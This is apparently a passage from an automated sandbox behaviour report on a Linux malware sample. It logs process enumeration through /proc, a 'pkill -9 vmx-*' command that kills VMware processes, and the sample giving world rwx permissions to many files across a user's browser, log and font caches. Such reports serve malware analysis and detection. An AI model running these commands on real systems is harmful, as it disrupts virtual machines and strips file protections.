      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/367/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/2951/statusJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/2951/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/5/statusJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/5/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/1223/statusJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/1223/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/6/statusJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/6/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/1222/statusJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/1222/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/7/statusJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/7/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/128/statusJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/128/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/2794/statusJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/2794/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/8/statusJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/8/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/129/statusJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/129/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/9/statusJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/9/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/924/statusJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/924/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/2718/statusJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/2718/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/529/statusJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/529/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/20/statusJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/20/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/21/statusJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/21/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/928/statusJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/928/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/22/statusJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/22/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/23/statusJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/23/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/24/statusJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/24/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/25/statusJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/25/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/26/statusJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/26/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/28/statusJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/28/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/29/statusJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/29/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/2053/statusJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/2053/cmdlineJump to behavior
      Source: /bin/dash (PID: 2891)Hostname executable: /bin/hostname -> hostnameJump to behavior
      Source: /bin/dash (PID: 2942)Hostname executable: /bin/hostname -> hostnameJump to behavior
      Source: /bin/dash (PID: 2952)Pkill executable: /usr/bin/pkill -> pkill -9 vmx-*Jump to behavior
      Source: /usr/bin/xfce4-terminal (PID: 2794)File: /home/user/.config/ibus/bus (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.xscreensaver (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/motd.legal-displayed (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/update-manager-core/meta-release-lts (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/fontconfig/bf3b770c553c462765856025a94f1ce6-le64.cache-6 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/fontconfig/cabbd14511b9e8a55e92af97fb3a0461-le64.cache-6 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/fontconfig/e13b20fdb08344e0e664864cc2ede53d-le64.cache-6 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/fontconfig/CACHEDIR.TAG (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/fontconfig/7ef2298fde41cc6eeb7af42e48b7d293-le64.cache-6 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/fontconfig/a41116dafaf8b233ac2c61cb73f2ea5f-le64.cache-6 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/fontconfig/d589a48862398ed80a3d6066f4f56f4c-le64.cache-6 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/fontconfig/158c65c810c0d352a587f5be66058e87-le64.cache-6 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/fontconfig/e49e89034d371f0f9de17aab02136486-le64.cache-6 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/fontconfig/4b14b093aebc79c320de5e86ae1d3314-le64.cache-6 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/sessions/thumbs-ubuntu-analyzer:0/Default.png (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/gstreamer-1.0/registry.x86_64.bin (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/blueman-applet-1000 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/gnome-keyring-ssh.log.6.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/gpg-agent.log.1.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/startxfce4.log.2.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/upstart-event-bridge.log.4.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/upstart-event-bridge.log.3.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/startxfce4.log.6.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/upstart-event-bridge.log.5.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/dbus.log.5.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/ssh-agent.log.6.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/gnome-keyring-ssh.log.7.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/indicator-bluetooth.log.1.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/update-notifier-release.log.1.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/update-notifier-release.log.7.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/ssh-agent.log.1.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/ssh-agent.log.5.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/ssh-agent.log.3.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/indicator-session.log.1.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/update-notifier-release.log.5.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/update-notifier-crash-_var_crash__usr_bin_blueman-applet.0.crash.log.5.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/indicator-application.log.1.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/update-notifier-release.log.2.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/dbus.log.4.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/ssh-agent.log.4.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/dbus.log.2.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/update-notifier-release.log.3.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/indicator-sound.log.2.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/update-notifier-crash-_var_crash__usr_bin_blueman-applet.0.crash.log.3.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/update-notifier-release.log.4.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/upstart-event-bridge.log.7.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/ssh-agent.log.2.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/gnome-keyring-ssh.log.2.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/startxfce4.log.5.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/upstart-event-bridge.log.2.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/gnome-keyring-ssh.log.4.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/update-notifier-crash-_var_crash__usr_bin_blueman-applet.0.crash.log.1.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/update-notifier-release.log.6.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/dbus.log.1.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/indicator-datetime.log.1.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/startxfce4.log.7.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/indicator-power.log.1.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/update-notifier-crash-_var_crash__usr_bin_blueman-applet.0.crash.log.2.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/gpg-agent.log.4.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/gpg-agent.log.3.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/indicator-keyboard.log.2.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/gpg-agent.log.2.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/gpg-agent.log.5.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/gpg-agent.log.6.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/startxfce4.log.3.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/indicator-sound.log.3.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/indicator-sound.log.1.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/startxfce4.log (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/dbus.log.7.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/gnome-keyring-ssh.log.5.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/update-notifier-crash-_var_crash__usr_bin_blueman-applet.0.crash.log.4.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/dbus.log.6.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/gnome-keyring-ssh.log.3.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/update-notifier-crash-_var_crash__usr_bin_blueman-applet.0.crash.log.6.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/startxfce4.log.1.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/ssh-agent.log.7.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/dbus.log.3.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/gpg-agent.log.7.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/indicator-sound.log.4.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/indicator-keyboard.log.1.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/upstart-event-bridge.log.6.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/startxfce4.log.4.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/gnome-keyring-ssh.log.1.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/upstart/upstart-event-bridge.log.1.gz (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/xfce4-indicator-plugin.log (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/xfce4-notifyd-theme.rc (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/directoryLinks.json (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/OfflineCache/index.sqlite (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/thumbnails/f1777111f5d0f1c81ffa04de751128fa.png (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/startupCache/startupCache.8.little (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/startupCache/urlCache.bin (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/startupCache/scriptCache.bin (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/startupCache/webext.sc.lz4 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/startupCache/scriptCache-child.bin (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/except-flashallow-digest256.pset (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/test-unwanted-simple.sbstore (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/base-track-digest256.pset (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/test-phish-simple.sbstore (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/except-flashsubdoc-digest256.pset (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/block-flash-digest256.sbstore (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/test-harmful-simple.pset (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/allow-flashallow-digest256.sbstore (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/test-malware-simple.pset (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/test-phish-simple.pset (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/test-track-simple.sbstore (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/test-block-simple.pset (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/block-flash-digest256.pset (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/mozplugin-block-digest256.pset (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/base-track-digest256.sbstore (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/except-flashsubdoc-digest256.sbstore (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/block-flashsubdoc-digest256.pset (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/test-trackwhite-simple.pset (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/except-flash-digest256.pset (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/test-trackwhite-simple.sbstore (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/test-unwanted-simple.pset (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/allow-flashallow-digest256.pset (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/mozstd-trackwhite-digest256.pset (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/test-block-simple.sbstore (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/test-malware-simple.sbstore (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/except-flash-digest256.sbstore (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/block-flashsubdoc-digest256.sbstore (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/test-track-simple.pset (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/test-harmful-simple.sbstore (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/mozplugin-block-digest256.sbstore (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/mozstd-trackwhite-digest256.sbstore (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/except-flashallow-digest256.sbstore (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/ce_T151c2VyQ29udGV4dElkPTEs (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/5A54E53FB3BC53E73B1E6C575995E2485DDF05AE (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/3288ECCBE79F56B14DBE6FEAC3F20AEA108CD0F1 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/7B303216787123E2E98A2B9594CDF8211C77C0EA (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/BD75785200C0E1E894D78880C72AC03D1B02A575 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/0AB1BE712BE7745C73A5EFA8DFC4780205FD18D7 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/EFBDF11BE5924869AB758722597BCD4B9EAF851C (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/209BF9506FC39F83D5367695CBEA892DE228933A (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/E59C4C731883450D84A0BAE7FDD94546BBC8DE04 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/A8DCC7B604F78716CE26EF1511D819991F119B22 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/C03274A1DDB8C8456BCF45E0E89194DCDADF46C0 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/8D418B8419BE8FFD07185661A573F8B8521147C5 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/698AC159A6BCBA0D13FE6F10F1A38E498F826F33 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/39C1621C6763027D614390D31A517751A4AD91C3 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/A5A82E00158C0784FE9E6B08670D514F8348D245 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/F2CFCA6D14DE5FA96E3127D89121F2E6F004D2CD (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/D8CC044500B261C6794589BED782B70836EAD65C (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/E325B486B777C14C29762600D998974140F8FD34 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/196BCA845E91608F7B4CA6127A60D20AF55413AC (bits: - usr: - grp: - all: rwx)Jump to behavior
